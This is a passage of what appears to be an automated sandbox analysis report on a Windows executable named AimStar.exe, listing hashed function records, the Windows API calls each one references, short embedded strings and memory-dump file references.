                                                                                                                                                                                                                                          • Instruction ID: 464900c6e3015259887501c3b5b433c8ee56b0ee9584e896a8ad368fe9974a98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5081D432D0CA0386F7647E258107278BAB8AB11768FD58075DA0987799CB2DFB0DC361
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                          • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                          • Instruction ID: 379511426e0802ca37d905f95375c66f50c94902af67ff3ace30cf609d056aae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C51A032B1DA028AEB14BB15E045A39B399EB44BA8F904131DE4E87788DF7CF849C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                          • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                          • Instruction ID: d7b9e28e7a0e7b2975c61d2e3997b38a28892beba2a6ee702c2072cdadd8c5f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC51B03290CA828AEB64AF21D049A79B7A8EB54BA4F984135DE4C87795CF3CF458C711
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                          • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                          • Instruction ID: a49e2157a4be6dee654568926976af875951c6a0edfb77c0dfb56b29a5198339
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D861A13290CBC585D720AB15E441BAAB7A4FB847A8F444225EF9C43B95DF7CE198CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,?,00007FF710F4352C,?,00000000,00007FF710F43F23), ref: 00007FF710F47F22
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                          • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                          • Instruction ID: 18c38e9a56cf858a10be994ae8134691fda7f0acf0bd8851e5c1fdb8a95aab21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F931C73171DEC145EA21AB11A851BEAA358FB84BF4F841231EE6D837C9DE3CE649C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                          • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction ID: b86ce9edf358cc3c53d4e31c833100a08ef38be6bc03ab033478483f9f9ff6e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81219F72B1CF4182E650EB14B4467AAB3A8FB88794F800136EE8D97756DE3CE249C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                          • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction ID: cb331a170d3f3e293194661f9bce03eb423522669a638f87ad7619fa3e66968b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D13872B0CE488DE710DF65D4412AC7B75FB457A8B848235DE5E97B89DE38E10AC390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction ID: 1df53c408ac87d21559ad5b7a398082c095e1d7d5acafaa765a838ba00b1073c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0351E672F0CA1296EB14EF24D9566BCB7A9AB44378F900135DE1E52BE4DB38B50EC710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                          • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction ID: fdb5de7aaca57e00742cf106519a0bc47bce86131521b43fea6d55521e0ca2ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39519F22E08A418AFB10EFB194663BDB3B9AB44B68F544435DE0997788DF3CE549C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                          • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction ID: 8a570ae75a92e774982ca7b832906848268e8ccc999ea8b94485a5429671bc05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E411E935B0C94682F694AB6AE5466B99295EBC47A0FC44030DF4947B8ACD2DF5C9C220
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                          • Instruction ID: c12f4a4090ee76b10519ae58c5fd535dcff11de2ede003b17cb943a543ac468a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA412716A0CB8241FB20AB25D40A37AF6A8EB80FB4F944235EE5C17BD5DE3CE449C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F590B6
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF710F4CC15), ref: 00007FF710F590D4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                          • API String ID: 3580290477-2254353971
                                                                                                                                                                                                                                          • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                          • Instruction ID: ef3b490f048f8a329f2fa1bfcd24d8d1d66c579bc2926647535106b817b576ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54418F36A0CF1686EB58BF2598420BCA7A8EF457E0B954035E94E43B85DE3CF589C360
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction ID: 6842dd85322821adde2f1955d3994eac806af9e481abc1da1606909e1ef9477a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9841C332B1CA4585DB609F25E4453AAA7B4FB887A4F804131EE4EC7788EF3CE505C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                          • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                                          • Instruction ID: 89ac80d5289822b82ddf2ab77d10cbd3a83d44d7a06f022864e139933ba404c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4221D522A0CA8182EB20AB15D04626EB3B9FB84B54FD54035DA8D43794DF7CFA4DCB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                          • Instruction ID: e56dc178e188a9fdc7249747efffc83fafe547be828e979c5e87751b2456d957
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD113A32608B8582EB219B15E40425AB7E8FB88BA4F984230DE8D47765EF3CD559CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                          • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                          • Instruction ID: 3c52e08cedf941c1ae9b1750b3696222e2ae38ee0496ff96ed257582475d87fc
